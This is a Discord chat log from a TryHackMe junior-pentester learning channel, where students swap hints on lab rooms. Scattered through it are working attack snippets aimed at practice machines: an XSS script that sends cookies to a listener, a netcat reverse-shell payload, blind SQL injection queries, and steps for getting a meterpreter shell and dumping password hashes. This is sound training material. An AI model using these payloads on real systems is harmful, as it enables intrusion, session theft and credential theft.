#junior-pentester-path

oh come on

i will never give the flag for this room cause it sucks and everyone should do it lol

ah come on...

reload

https://tenor.com/view/star-wars-yoda-patience-sw3-gif-21070142

my head is already reeling from even just looking at windows stuff ;-;

@rough ore are u still stuck?

yes

dm me

try F instead of f

anyone here finished the LFI room ?

on the service name

i'm doing with 2 other friends right now the task 8 and nothing we try is working

maybe your method is wrong 🙂

oh sorry i get the version but from control panel

open control panel ..you will get it

Gave +1 Rep to @fallen crater

maybe because it is a trivial solution

anyone else having issues with the final XXS challenge. Site not loading for me

yw

i think reloading helps

cant find it lol what would u name it ?

something .exe

freefortnitebucks2021.exe

same about local files to me

blew my mind

that i couldnt make it all just yet xd

think about what would make sense... how the unquoted path exploit works

basically it'd be part of the path name

I always wonder what's Advanced

its just beyond

that would be very handholdy

it sounds so obvious.. it is making me doubt myself

Basically maybe reread the instructions again, try to understand what it means to exploit unquoted service path

just think of this example:

if the service runs under: C:\Hello\welcome all\service.exe

When a system come to execute this service it will open C:, but before opening this folder: welcome all:
it will notice that there is a space between the word: welcome and the word: all, then as it is unqouted path the system will try to run the executable welcome.exe(which is not exists) in the Hello folder, and the system will not find this executable, then it will go to the original service which is C:/Hello/welcome all/service.exe to run it.

all you need to do, is to insert your executable somewhere and with a specific name before the system runs the original service..

I got the idea, but my brain just wont see it.. let me rerereread ist one more time

focus on it you will get it

OH MY GOD

https://tenor.com/view/kermit-kermit-the-frog-daddy-gif-5368681

im dying

https://tenor.com/view/facepalm-kermit-gif-13779445

it was too easy

i should really go to bed

no its ok, it takes a while to figure out 🙂

Hi guys I got stuck in SSRF room Task 2 "SSRF Example". I'm not able to understand how does &x= work . I tried use https://website.thm/item/2?server=server.website.thm/flag?&x=id=9 and Server Requesting: https://server.website.thm/flag?&x=id=9.website.thm/api/item?id=2 Can someone describe what's happens

So, in nmap04, it says "run nmap with -O and TARGET_IP", but if I do that, nmap says the host is down and I should use -Pn? Should it not just work without -Pn?

you are nearly there. check the URL at the bottom of that screen. try to make the first part of identical to what you are looking for

reading the explanation on part4 why u add &x= solves the problem, its simple, dont overthink like i did

Hi, I dont get the question on SSRF Task 3:
What website can be used to catch HTTP requests from a server? What website it refers to?

read the last paragraph again

lol, I must be blind..., thanks

Nvm I forgot to connect to the THM VPN

jsut wanted to say it worked fine for me

I'm stuck on Subdomain Enumeration in the Virtual Hosts section where we use ffus and FUZZ and the namelist file to try and find subdomains. When I run the command, it runs through all lines of the name list, but each line just says error and gives no info. Anyone else encounter this?

It's like it goes line by line of the namelist and every entry at the end it says error. each line says teh same thing. I think I'm all connected okay

just tried. I guess not. Request timed out.

So, refresh and try again?

attackbox

that's what I thought.

I'm initializing a different attackbox as we speak, though.

ugh, same eexact error. Each line reads:

:: Progress: [150/1907]:: Job [1/1]:: 4 req/sec :: Duration [time] :: Error

i just tried to visit the IP in my browser and it said it couldn't be reached.

it looks like the site is down maybe? acmeitsupport.thm

Did you add it to /etc/hosts?

is there an issue on the THM network?

i don't seem to have any issues

isn't that what the web developer does and we're trying to find names stored there? It successfully is grabbing the namelist and from my files and scanning it.

i cant get the site for the box i just spun up to load i can ping the machine but the site will not load

which site?

i am doing the last task for the XSS room

the address it gives me returns a 504 error

I don't know your command as you haven't posted it

there is no commend to post i am just trying to load the site so i can start 🙂

I'm in am attack machine and able to use it... maybe just your end is having an issue. perhaps close out THM and reload?

just about to try that

Yeah, it was addressed at the other user.

my bad

first time it didnt open website for me, next time when i relaunched the machine, it worked fine

in windows prives sc query windefend not working

ye looks like i had to terminate both the attackbox and the target and restart both that worked

Hey guys i am on the Metasploitintro room and the question
What command would you use to clear a set payload?

I can't seem to find the command, not sure if i have overlooked this. any hints?

Google it

the man page can help

That too

But generaly if you don't know an answer your first step should be google

Yeah i had googled it, but nothing was showing that i was looking for

read the help page type: help

type help and read the help page you will figure it out

Glad you figured it out.

@fallen crater NGL i forgot about that help page, cheers

Partially, but the difference between dns/domain names and VHOSTs is incredibly important

If you can't resolve what you're scanning, your system doesn't know where to send the traffic

I can't see your command so I can't tell if that's the case or not.

its written in that room

I'll re-read again

#900054423588470854

https://drive.google.com/file/d/1rsahJra3nnVDQBR9zbPfozWCNHCp6-ui/view?usp=sharing

Follow those steps and then you will be able to post images

!docs verify

BTW it is an easy name to guess:

you use set to set a variable
you use ..... to unset a variable

both last so long

@fallen crater I thought i tried the easy options let me try them again

try you will get it

Don't post a drive link. If is verified your account then just upload the picture

@fallen crater I had the first one but didn't insert the last bit -,- Thanks haha

Gave +1 Rep to @fallen crater

lol

haha nice what a thing

can someone help me with task 13 burpsuite basic?

what is the problem ?

@fallen crater the pentester role come with the title?

i cannot find that file

yes three tickets and you will get it

Awesome i got the title but not discord yet

It'll update. Just give it a bit

Yeah prob update tomorrow

you can update it manually

@oblique sand go to the thm bot and type that command for update stats

Ahh

by typing !verify <your discord token> to the THM bot

@fallen crater can u help me with task 13 burpsuite basics?

I’ll do that cheers

i cannot find the requested file with the flag in site map

i will give it a try now

ok

did u get something ?

yes

open all webpages(i.e., home, about, contact, support, product) and let the traffic goes through the proxy without intercept it then go to (Proxy=>http history) on burp suite and you will notice a strange file name see the response you will get the flag

this is all i get

you didn't open all the pages i think you missed one or more pages like the support page or the product page i think

i openned all the pages

try to go to http history..under the proxy tab

does netsecchallenge take taht much time?

Nope, but there are trivial stuff take that time like the syntax for something or some brute force stuff

i think this issue has been finished right ?

Hey Everyone, I'm looking at the Linux Privilege Escalation:Path task 10. The example uses gcc to compile the executable to run as part of the exploit. The VM associated with the task doesn't have gcc installed. Is there something I am missing? - Never mind, I'm an idiot and missed what I should have been doing. 😄

I am solving the Vulnerability Capstone

lab and I am stuck

can somebody help?

yes what is the issue?

I am having trouble while executing the code

can I dm you?

for sure

in netsec, last flag, what percentage is ok to get a flag?

its so slow... im at 12%

not sure the exact % the filter is set at but I was down to 5% and still failed- not til I got to 0% did I pass that one;)

can i dm u?

ok

good day..apologies for the noob question, but the pentester title obtained in this path, is it temporary?

have you tried -sN

if it was like the last title rewarded from the last ticket give away yes

copy on this sir werlegion, thank you

I think this issue has been finished, hasn't it?

yeah, thanks to you

Gave +1 Rep to @fallen crater

can someone please assist me with the ssrf room task 5 im not understanding how to input the data

are you using dev tools?

i wasnt reading the material enough i think i got it

Hi all, im doing the burp suite hashing portion

Can't seem to get the relevant one that is == to the one given in md5. Tried encode using ascii and base64

can anyone point me in the right direction?

cyberchef

what is the task number ?

task 4

Did you follow the hint instructions ?

yeah.. hash them to md5, then i use encode to base64. Tried ascii hex too

maybe i misunderstood? So i'm lookg for the one that is the same as 3166226048d6ad776370dc105d40d9f8?

yes this is the last question i think, isn't it ?

yup, last of task 4 🙂

you have 3 files contain three different values all you have to do is to grab each value and put it in the burp and choose the mentioned hashsum and check the result to see if there is any result matches this value "3166226048d6ad776370dc105d40d9f8"

note: here you need to look at the hex values

Need a hint ?

hold on

let me try again hahah

I still don't get the same md5

but just trying randomly

look at the hex values

it is next to these random values there are hex values check them, and try to figure it out

the one all the way to the right?

there is a space between each two characters or some spaces from the left to the right like : aa bb n3 dd 88

did you mean that one ?

it is one step one way. just choose the mentioned hashsum

it looks like that

urgh

sorry, dumb qn. how do you insert a screen shot here?

not sure why i can't drag it in here

check your keyboard there is a key: PrtScr/SysRq, next to F12, just press on it and get a screen shot and choose copy to the clipboard, then just past it here directly CTRL+v,

if this didn't work try to install any program

hi

same here not able to send ss

you can save it and upload it

not it's failed to upload

OOOO I GOT IT

ok i have to save

Thanks @fallen crater !!

Gave +1 Rep to @fallen crater

i send u one ss

for that when i am submitting the flag it's showing wrong

even it seems right

@fallen crater

click on the plus sign here

There's no plus sign for mine though

But i do have for other discord chats

wow how u did that one

how...

plz check dm i send u ss

you can upload images to imgur and send the link here

https://imgur.com/upload

nice to hear that

was a pain haha

haha keep moving forward

https://discordapp.com/channels/@me/901638153830563850/901639462440808450

can u access it @rapid kite

Nopeee

hello im on task 5 linprivesc room i was wondering if someone would be so kind as to help me find a working exploit and how to upload one it says permission denied every time. when i use find / -perms a=w -user karen -type d 2>/dev/null nothing returns so where can i write the upload

out of topic but damn you guys are fast.

Has anyone done the sql injections

???

Yes

What do you need help with?

Hey, in task 11 of linux priv esc i mounted the nfs share on my attaching machine where i compiled the c program, so i'm supposed to find that file in the target machine in the same directory as the mounted share but i don't seem to find anything, anyone go an idea

On task 8 I can't find the database. I'm stuck enumerating at 'sql_'

Well, what have you tried so far?

a-z A-Z 1-9

Show me your command

admin123' UNION SELECT SLEEP(5),2 where database() like 'sql_M%';--

If I delete the M i'm getting a success

I just can't enumerate anything beyond this

Try again

You're on the right track

You missed something

Oh wait

Actually

The database name isn't just sql

There's more to the first part of the name

Im stuck at 'sql_'

I can find what goes next

can't

Get rid of the _

how do i upload a exploit to the machine if the permissions wont let me in the linprivesc

You missed somethinf

Which task?

Why does it give me a success then? Task 8 Time-based

No idea

Could be that there's more than 1 database

But I'm telling you right now, you missed a letter before the _

task 5

Yep just got sqli_

Yea. Now continue from there

u make a server in ur attacking machine

and use wget to get the exploit file from ur attacking machine to the target

You need to host an http server on your attacking machine

Then use wget from the target to download the file

.. anyone got idea about this

i did that when i try downlloading it says permissions denied

Move to /tmp

You likely don't have write perms for the directory your in

Try rebooting the machine. If that dosent work I'll need more info

i was able to get the file uploaded but im not sure if it is the correct exploit and if it is i dont no if the code needs to be altered to work because i keep getting errors

What errors are you getting?

It's very hard to diagnose errors without seeing the actual error message

i closed the machine been stuck for like three days on that and frustrated to the point i want to put my fist through the wall

Ah rip

check your inbox

Does anyone know about Task 8 of Practical Example (Blind XSS)? Do I have to specify a port from a target website port or netcat one?

You're trying to catch the request, nc port

Im trying to get the cookie thingy

For the last answer

Of the last task

I know a lot of people had trouble using nc on that room, I ended up having to reload and just use the THM catcher

Ok

I opened it but i have no idea how THM catcher works

I also tried to setup a payload in html

But for some reason it didnt worked

It just rolled back

Dont know what did i do wrong tbh

Anyone willing to give some tips on the LFI challenge 1 on task 8? I've seen the responses for people stuck and it mentioned changing the method. I've changed the method to to POST and giving different path names, but it never returns the flag. Any hints?

what are you using to POST the data

I've tried the dev console, under the inspector tab. After I change the method I hit enter and then refresh the page. I've also used Burp and changed it there. Maybe I'm doing it wrong?

try learning how to send POST data with curl; the web fundamentals room is a good place to learn curl

I appreciate the help, but how would curl return a different response than what I see in Burp?

@jolly vine Inspector worked for me, what are you querying?

tbh not sure - im not very good with burp

I'm querying the following:
||POST /challenges/chall1.php?file=../../../../etc/flag1 HTTP/1.1||

When you change the method to POST in dev tools, do you enter the query? I think maybe because you are refreshing the page.

@jolly vine Where is that being inputted?

Well now I get an error so yay! My dev console was over the errors and so I never saw them. You were right though, I shouldn't have been refreshing the page lol

That was originally being input into Burp, but now working out of the Dev console I finally got an error, so that's better than nothing!

You don't need burp for that challenge also

Ohh haha. It's always the simplest thing. Glad you got it working 🙂 .

Thanks @gloomy crescent

Gave +1 Rep to @gloomy crescent

Thanks @opal stirrup !

You got it now? Congrats!

I am still stuck and confused

Can anyone help me with this task 8 challege ?

challenge *

File Inclusion

Which one?

can anybody tell me how to do the task 5 of command injection\

i need help with burp intruder task 11...its giving me error abt invalid number settings

Hi everyone, in windows privesc room, dll task, I can't make it work :

Launch room
From open VPN kali
Build dll as instructed + code from hint to change Jack user pwd
Wget dll
Put dll into temp
Open cmd type commands (the servive isn't started, so only start worked)
Go to jack directory
Windows ask login
Type pwd put into dll
Not working...

I tried to restart the box several times
I tried to re stop and start the service, but sys won't let me stop dllsvc

whats your dll name

Nevermind found it, I changed the password of Administrator instead of jack, and it worked 🙂

Hi, I literally know nothing about hacking but I'm willing to learn because it sounds fun, I really need someone to teach me how to hack and what web to use aka step by step and I will be thankful.

yeh following the pathways might help u abit

Where

Sorry tho

I am beginner

Hey Hi, just wondering if anyone can help me in SQL INJECTION task 8 Blind SQLi - Time Based
so i've got table schema and table name
now i'm trying to find out the username
is that correct?
if anyone can type in pvt please

better find the colum names before that

On XSS,room the final task. I already capture the cookie using netcat and thm catcher and decoded it but when i paste the answer its saying i get the wrong answer. I don't know if i'm still the right thing tho lol

had to grab the cookie with another script apart from the one shown in the procedure

got it,thank you~

Can someone let me know if it normal that the hydra brute force lasts longer then 30 mins for the Net Sec Challenge for question "We learned two usernames using social engineering: eddie and quinn. What is the flag hidden in one of these two account files and accessible via FTP?"

30 min no

the brute force should take a minute or 2, its really quick

did u use the right user txt file, paths, ip and port?

Can I get help with SQLi task 8

Can I ping my command to any of you for a check? .

||admin123' UNION SELECT SLEEP(5),2 where database() like 'sqli_four and WHERE table_schema like 'a%';-- || got this for sqli task 8, but no matter what i do for table_schema it doesn't find anything

Try scripting your way from the command line... automation is everything 😆

and, for reference, the previous task shows you the commands, you have ust to add the "SLEEP()" in the middle

Nmap Advanced Port Scans

ye got it working

can somebody help me with the task 5

turns out i misspelled something when i changed the sql

I have a question about, ||"Make sure you leave the two blank lines at the bottom of the request!"|| why is this a necessity?
Additionally, is there a list for weird request headers which can be used for testing stuff (as stated in Task 5 of Burp Suite: Repeater) or stuff like that can be random ?

i am inside the C:\Windows\system32>

i am looking for flag.txt

how to find ?

You still, stuck

I got this now ||admin123' UNION SELECT SLEEP(5),2 FROM information_schema.tables WHERE table_schema = 'sqli_four' and table_name like 'analytics_%';--||

Can't find the next letter or number for it tho

Right path but wrong table lol

wait what

and maybe there is not a "next letter" on this word

you have discovered one table

there's more than jus one table

but there are at least another one

aha theres a %

wait so im on the complete wrong path

Yeah you can get the name of tables then tag the onto the end of ur command tho so u can search for another.

Right path

Enumerating wrong table

well, you should step back if this is not the table you need, begin again from "a%', change it to 'b%', 'c%'...

eventually you will find the table you need. Some people have automated this

time to figure out how to automate it

Also can i get a nudge onto the right table if the one im in is incorrect

wait is the table i need start with ||users||?

the example is pretty similar to the previous one, so the idea is the same, find username and password by guessing one by one the characters. So, you may suppose the table name. Another helpful topic if you do it manually: How would you check that this is table name and no character left? Build this query from the one you have now

Man what's up with the tickets always being the same, after 8 rooms all the same

SQLi is a pain, itll be faster learning to automate it

yes, but to automate a thing you should first know ow it works

So users I believe is the full name of the table

makes sense

how to run ELF file

to obtain reverse shell ?

not technical question: I have received one Throwback voucher. In case I get three of them, what are they for?

anyone has done https://tryhackme.com/room/metasploitexploitation room

I am still on burp room, maybe tomorrow I'll reach it 😄

./file_name.elf
make sure u have +x permission

i don't understand, i am not getting a reverse shell

i have tried x86 as well as x64 payload

https://tryhackme.com/network/throwback

😅 thanks

Gave +1 Rep to @wild sundial

u put the correct ip and port as well as listening to it??

need help on task 12 linux priv escalation

yes, which payload should i use ?

i think i need to exploit the suid binary, but i'm stuck

iirc its already described in the procedure which is linux x86 meterpreter reverse tcp

thats not working

I'm running the command with -L user.txt where both usernames are in

did u set the payload while inside multi handler?

yes i just did that.

i was messing up with payload

instead of linux/x86/meterpreter/rev_tcp i was using linux/x86/meterpreter_rev_tcp

i'll try kernel exploitation

glad that u find out

I need someone to eyeball my cookie fetch script for Task 8 of XSS. I am not getting any response on my listener. </textarea><script>fetch('http://10.13.26.99:4455?cookie=' + btoa(document.cookie) );</script> I fear it is something very basic, but I am not sure. I also don't know how to black anything out like a hint.

did you set a listener?

yes

using my Tryhackme VPN

what is your host IP on VPN?

VPN is the 10.13.26.99

I can ping both the machine and the VPN

yes, it is the port I normally practice with.

I'm not getting a reverse shell while exploiting cronjobs in Linux PrivEsc. Am I doing something wrong?

not sure if second slash is needed, between port and ?cookie

I was just going by the way it was written. I will check

OMG! ES

YES*

try with <script type=“text/javascript”>document.location=“http://IP:Port/?c=“+document.cookie;</script>

I had to use Chmod. Totally didn't see the permissions. Thank you @modest arch

Gave +1 Rep to @tulip elm

I'm trying to use the EternalBlue exploit for https://tryhackme.com/room/metasploitexploitation and msf keeps saying: [-] 10.10.58.136:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [-] 10.10.58.136:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [-] 10.10.58.136:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Still waiting to see if I get any response. Still nothing on the listener.

Guys, hello, in Burpsuite:Repeater

In the practical challenge, it says to change the number at the end of the request to extreme inputs

What is considered an extreme input

very high

999999999999999

or very low

yeah

Alright let me try

It's always replying normally

try negative

Im putting like this

like what

lower than 0...

-69

Sending pic

Ahhh

AHHHH YESS

Fuck my bad

anyone know?

I see it

cant u just use the module?

I had to keep trying the exploit, it finally took

What module

oh okay

np

Why do i keep getting already gotten tickets, it's been like that 7 rooms in a row

Why

Who programmed this

"use exploit/windows/smb/ms17_010_eternalblue"

I am

Hi team....just wanted to check...any idea what is this pentester title in this path...i mean once we have redeemed it, what happens?

You get a title next to your name

thanku brother

Sooo the number of 3 months voucher decreases? Cmonnn mannn

I need to be quick to get something? Not fair

Wow

Same man

It sucks

Im busting my ass here

damn i hvent got even one eJPT

such a huge bad luck

Hi guys where can I get help on jpg-getting a error

Jpp

I definitely learned alot, but like damn would be nice to get a good reward

How long does it take to finish?

I'm still on task 3

Sorry I mean room 3 task 3 of jpp

Can anyone give me a hint for File Inclusion room

I am not able to find Flag2

I need help on authentication bypass task 3, trying to brute force but getting a error in terminal

sure, what point are you?

Now I'm getting this error...

[-] 10.10.58.136:445      - Rex::ConnectionTimeout: The connection with (10.10.58.136:445) timed out.
[*] 10.10.58.136:445      - Scanned 1 of 1 hosts (100% complete)
[-] 10.10.58.136:445 - The target is not vulnerable.```

target

I am not able to find flag2 in last task

yes, but, where are you stuck?

I changed cookie value from Guest to admin in burp, then I see Welcome to admin page, get your flag

yeah

ok, play with this cookie value a little more, change it, idk, maybe to test

and see what happens

Yeah

Oh, wait. Is it because I'm using WSL2

Hello, just a quick question. What do they mean by "reverse dns"?

ip->name instead of name->IP

weird. not getting reverse shell in crontab task. i also gave +x perm to the sh file, wrote exactly as what the task described.

Linux Privesc, Task 10 : I guess i'm unable to understand the process. Can anybody help!

It is showing error failed opening 'includes/test.php' for inclusion (include_path='.:/usr/lib/php5.2/lib/php')

now you have a hint on what shows depending on what you enter on the cookie

no

merci beacoup!

if you enter admin, what is shown on the page? If you enter a not valid thing, it shows you an error with some interesting data: From where it includes the data. From here, you can test and play with the cookie

lmao terminating machine solved

what was the issue?

not getting reverse shell back

but, the cause, if you have all well configured on the cron tab abuse

tried itbut didnt work

have the same issue

anybody tried to get a shell on the Command Injection machine? I made sure outbound port wasn't blocked using telnet, I've checked in the bin directory to make sure the binary I wanted were there. First I've tried some bash payload but the & are getting truncated (since it's used for query string parameter I guess), I've also used this nc payload ||;/bin/nc -e /bin/sh (tun0 IP) 1234 (replacing space with url encoding %20)||.
For listener I used ||nc -l -p 1234 -vvv||, anything else I could have tried?

ummm! anybody?

ah okAY!

all you have to do is replace the file with the rev shell code with the correct ip and port, give exec permission and listen to it.
worked for me aftering terminating and restarting the process.

anyone know why this errors ||https://website.thm/analytics?referrer=admin123' UNION SELECT SLEEP(5),2 FROM information_schema.tables WHERE table_schema = 'sqli_four' and table_name='users' and COLUMN_NAME like 'a%';--|| for task 8

put admin not admin123

Still getting the same error

saying collumn_name not found but thats what I'm trying to find

as the same thing works for task7

then change 'a%' to 'b%'...

been trying that

I made at least one similar mistake yesterday. I'll give you a hint first. On Task 7, check this and previous step. the query you send has a difference apart from the new COLUMN_NAME part, check it

Is this why the metasploit eternalblue exploit isn't working?

thanks

Gave +1 Rep to @red wraith

turned out I didn't change a tiny bit

shouldn't matter but if that exploit fails once, you need to restart the target machine

Oh, I see

that exploit is real finicky

Thank you

Gave +1 Rep to @visual crest

managed to get the flag, thanks alot for all your help :)

Gave +1 Rep to @red wraith

you're welcome, as I said, had the same isuue. Lesson re-learned: Check twice all the command

yep

I've done this 5 times now and it's still not working

have u set all required options?

Yes

Room File Inclusion challenge last task... Can anyone help me finish

can you screenshot your options?

Sure, gimme a sec

it ran on the first time for me and I felt like I won a prize

you have to tell us your issue

you can use file inclusion to make the server request a file from you

yes i did this

Blurred my IP, but here you go: https://streamable.com/mk5747

so verify if the file requested from you is correct

linux priv esc. task 2 What Linux is this?

how to find that i just know that it's ubuntu

cat /etc/os-release

o

ok

thank you @iron vale

Gave +1 Rep to @iron vale

Thanks

I'll try that

and your LHOST is your 10.x IP?

Well. Because it's WSL2, it's the IP of that

I tried with the IP of my windows PC with WSL2 on it, and it said it couldn't bind to the IP I gave

it should be the IP of your THM VPN

are you VPNing within WSL?

No

Should I

yes

I've never had to do that before for any of the other rooms, but sure

you should be doing your VPN within Kali/attack machine but also like Neo said, if you have SMBUser/Pass, you should fill that in

(honestly for security reasons, not that I don't trust people who use THM - aspiring hackers, I'd never VPN from my host machine)

I thought you meant on my Windows PC, which, like I said, has worked for all the other rooms

Running and running within WSL are two different things

how to complete task 5 of linux priv esc

i am unable to find an exploit

the flag is in front of me, but i don't have permission todisplay it 😆

also you are using a staged exploit when the example screenshot is not

I have no idea what that means 😓

you are using meterpreter/reverse_tcp instead of meterpreter_reverse_tcp

Oh

you identified kernel version, looked for exploits but couldn't find a kernel exploit?

i got but it contains errors

it's in C programming lang.

yeah you compile it with cc

gcc man

thanks a lot i got and i will never forget this info 😄

Gave +1 Rep to @steel ice

not cc

on the system

miracle ❤️

They're both c compilers, it doesn't matter which you use. Gcc is Gnu CC

not a man... but you are the one getting compile errors 🙂

ohhh

leave, say me what to di

do

excuse you?

further so that i can get escalated

i mean close that topic and help me

How do I use that instead?

Oh

It worked

well you are the one not saying what errors you are getting, where you are compiling it, etc

yay!!

Thanks @visual crest @modest arch

Gave +1 Rep to @visual crest

yeah its the silly little things

see i took 2 files from the internet both the codes were different but, i think that their work is same i took it from exploit-db

and me not really knowing what I'm doing

Matching the payload with what you've generated and what metasploit is listening for is crucial

one code is throwing 2 error while the other is throwing multiple errors

Errors or warnings?

!docs verify

If you follow those steps, you can post a screenshot for Zojja. Will make it much easier to help.

yes warning

you could provide screenshot, also verify that you are compiling on the system you are trying to compile on

ok

I would ignore warnings if it compiles

thats what most programmers do...

yes u r right both the programs are throwing warning, not error

mount failed..
couldn't create suid 😦

the output

I've been trying the whole night and this morning on the task 11 of linux priv esc it's simple i just mount a share on my local machine then make my exploit on there and i'm supposed to find it shared of the directory in the target machine but whenever i check the target machine nothing was created, anyone faced this, it's really annoying

the second code is showing this output:

spawning threads
mount #1
no FS_USERNS_MOUNT for overlayfs on this kernel
child threads done
exploit failed

again, you need to share more details, what kernel does the system, what exploit did you find

ok

is it me or is network security hard..

network sec. module is easy

damn senpai

so you mount the share on your system, then you put whatever you put in that directory, check target system and the file is not there? what share are you mounting on your own system?

like everything, it takes practice

3.13.0-24-generic <-- the version

of kernel

pretty hard to comprehend the icmp portion :/

in the task there are 3 available share, which 2 can be accesible to read in the target machine

i tried with all

each time but no chance

the code i am using -> https://www.exploit-db.com/exploits/37292

can you do some screenshot of your steps or outline? if you try to mount, put file there and file still doesn't exist, then something failed with your mount

@visual crest

how do i fix this

This is for Ubuntu... is the system Ubuntu?

that's what i'm thinking about, yet the mount command outputs no error

yes

it is

don't make me boot up this sytem...

I don't remember the kernel exploit being Ubuntu

A good first step would be a screenshot rather than a picture of a screen

i am really stuck

yup i created a directory mounted it to a share and then created the file in that directoruy which i mounted with the share

can you show a screenshot of the info you found where you determined it was Ubuntu?

can you show a screenshot of this?

why is it showing i don't have permission to attach file

??

I'm trying to exploit the system, I didn't copy the exploit to my system so I dont remember which one I used

i still find nothing in the share

ok just validated, that exploit you linked is the right one and works perfectly

Kernel exploit

well on the target system, you don't have access to /home/ubuntu do you?

i don't have access to /home/backup but i do to the other 2 directories

i tried even with /tmp same thing

you need to use the mount that is /tmp (or in tmp? I don't remember)

i think i can mount on any of the shares i can read and that make no difference

i feel the mistake is somewhere in mount command but it's not outputting any error

try tmp

humor us 🙂

yeah I think all of them do but you can only access 1 of them on the target system

yes

all 3 of them do

there is acutally a question about that and i did answer it

also same

i would reboot

might want to just restart from scratch, try it again, use /tmp

actually

lol

when i logged again in target machine

i could see all file being shared

even in the other directory

guess it had to be refreshed or sth

thanks for help)

no prob

my terminal freezes whenever i do the NFS privesc

is it a network issue?
btw, i use virtualbox as 2GB ram

Heho, i need help with "Authentication Bypass" Task 3 "Brute Force" :/ I tried it exactly like described, then with Burp, then with a bigger wordlist rockyou and so on. I always only get back the 200 status code. He just doesn't find any working combination 😄

you use the usernames you found in task 2?

it shouldn't be your virtualbox... maybe try the attack box?

i tried both kali vm and attack box, and i used the result from the task before. it is working because i see it at the result of tries (always x4).

the wordlist they provide should work

I mean its a super simple password

ah yes! true

Yeah, it should be so simple :/

and you create a file called valid_usernames.txt that is the usernames from task 3? and do the command exactly as typed?

It is the exact command executed within the Attackbox 😄 All 400 combinations are tried and he only finds 200 status code

sorry attackbox was for einst3in

@visual crest is CISSP too hard?

It was still a valid hint ^^

not too hard

I'm probably goin for something tough after oscp

can you screenshot your command and usernames? also validate no spaces in your username file ?

I will have some rest after oscp 🙂

how can i insert images? i only get errors when i try it ^^

Are your prepared?

oh you aren't verified

!docs verify

to rst?yes. For OSCP, I finished lab time yesterday, I have a month to the exam. Will prepare BoF next 2 weeks, and do some machines on my own. I think that I should be prepared, but we'll see

whoa whoa! That sounds amazing. Would you like to get me some tips? I'm kinda beginner

well, I think that there is plenty of people here with more expertise than me. If you are beginner and can not dedicate much time, go to he new learn options or at least three months of lab. I have done and documented exercises to get some extra points on exam, and to have some review/idea, followed a lot reddit/r/oscp ... There you may find some good resources and indications as TJ Null's list to machines to do before the exam

Ok, i found my error 😄 The correct hint was that there should be no spaces in the username files. I piped the output of the first task into the file, because i thought that this is a special format which "ffuf" can work with ... But it seems like you have to create your own file with the names you found ^^

awesome

Thanks ^^

Gave +1 Rep to @visual crest

Oh ! okay! 🙂

there are plenty of blogs and what not on how to prep for OSCP

I did eJPT last year, and another one quite similar, not famous, spanish one, and keep feeling a total beginner

need help on linux priv esc task 12, what vulnerability can i exploit?

what have you found?

PATH, SUID, sudo, cronjobs, nfs didn't work

they didn't?

there is one thing in that list that will get you to the first step

i don't know, if i need an horizontal move to become missy

yes

or at least thats a good path to explore 🙂

base64 to get the missy's ssh?

how can i solve "mount.nfs: Protocol not supported" whenever i mount
nfs taking too long

did you try it?

can you post a screenshot?

sure

why vers=2?

try this mount 10.10.0.243:/tmp /tmp/share

and why -t nfs ?

I mean I'd try the exact command shown in the explanation

ahh imma try it again
thanks both of u

can i dm you?

i was like, damn! he must be a professional in using NFS. And that's the reason he's using other flags

well sure but can you try the exact command given?

before DMing

ah I wanted to make it more complicated so that I could read the shadow file directly, thank you for your goodwill

Gave +1 Rep to @visual crest

Linux Privesc Task 11 NFS. Unable to see the created file in the mount

I just created a file in my share, but can't see the file in the victim's shared folder

it can take a few seconds but also share the command you used

mount -o rw 10.10.226.13:/home/ubuntu/sharedfolder /home/root/bakuphere

do you have access to /home/ubuntu/sharedfolder on the target system?

yes

you do?

umm! ? u mean?

didn't get u

well i can cd to /home/ubuntu/sharedfolder

I mean if you are on target system and cd to /home/ubuntu/sharedfolder and type 'pwd', what do you get?

yes

yeah i can access

I might have to boot up this system to try it out

can you screenshot?

yeah! wait

there u go

ok weird...

wait... do ls -ld . on the /home/ubuntu/sharedfolder

'ls -ld .'

or ls -ld /home/ubuntu/sharedfolder

ok weird I am gonna try this

can you try to use /tmp instead of /home/ubuntu/sharedfolder

yeah! my terminal was just freezed that's the reason i switched ot sharedfolder lol

wait still! lemme do it again

because I swore when I did this, I couldn't get to that directory at all but you can and you can read it

lol that sounds weird

yes

still!

can't see the file

lol

ok show a screenshot again?

yeah sure

I had also restarted the target machine. But i get the same issue

I mean that looks all ok

Feels like i need one more restart

lol

idk why it isn't workin on me then

reboot your own system too

i don't think i should do that else i'll lose access to attackbox. Its around an hour now. I'll lose access if i restart again

you found a mistake?

go on

makes sense

oh! yes

good eyes

but why do i feel i also did that

wait lemme see once again

okay 😄

hey in File inclusion when i upload from my apache server it gives my own shell.
How can i get victim's shell????

guys, what is throwback ?

and what can i do with it ?

did you win it?

i need one more card

oh, ok thanks

No

tryin...my system is damn slow

no! i didn't ! i have an intel pentium

loll! i think you were right! But i remember i actually did the same as u said before but no change.

idk how it worked now!

No idea what's happening with me and my system

haha ! lol

Is this correct ?
/playground.php?file=http://<kali_ip>/shell.php

I'm stuck on this question of the metasploit: exploitation room

I don't know how to do that

The hint doesn't help me

did u extract the passwd?

I don't know how to do that

I tried running that command in the reverse shell and it said not recognised as an internal or external command

I don't have a meterpreter prompt

I just have a reverse windows shell

if i remember, we need to get the windows shell and then convert it to a meterpreter then execute hashdump to get the hashes and pickup pirate's hash and crack it using john

from metasploit right?

?

Ctrl Z the process. then you get back to your meterpreter shell and then

search shell_to_meterpreter
use the module
show options
set all the required options, also set the session 1. As u just made the win shell background
run

you'll now get a meterpreter shell

now :

execute hashdump to get the hashes

copy pirate's hash

go to your local machine and crack the hash . keep the --format=NT

Ping me if you still get any issue!

I can't get the flag from these 5 : )

Thanks

Gave +1 Rep to @north dove

wait lemme see !

can u give me 10 minutes? lol ! i was goin to make a subscription.
After i saw your message i thought to do yours first ! but unfortunately burp intruder room requires subscription

okay take your time np

Anyone else did this?

yeah I positioned it next to the GET request i mean the URL/tickets/$number$

lol! my account is empty

wait lemme see if i can help anyway

how do I know it it's MY cookie

yeah please

what's the question?

gcc -fPIC -shared -o shell.so shell.c -nostartfiles
i am not allowed to run sudo
and gcc is not installed, nor can i install it

ok ok.

yeah!

got it

I gave it above

oh ! lemme see

How about changing the length

try

u mean number 1-100?

click the length

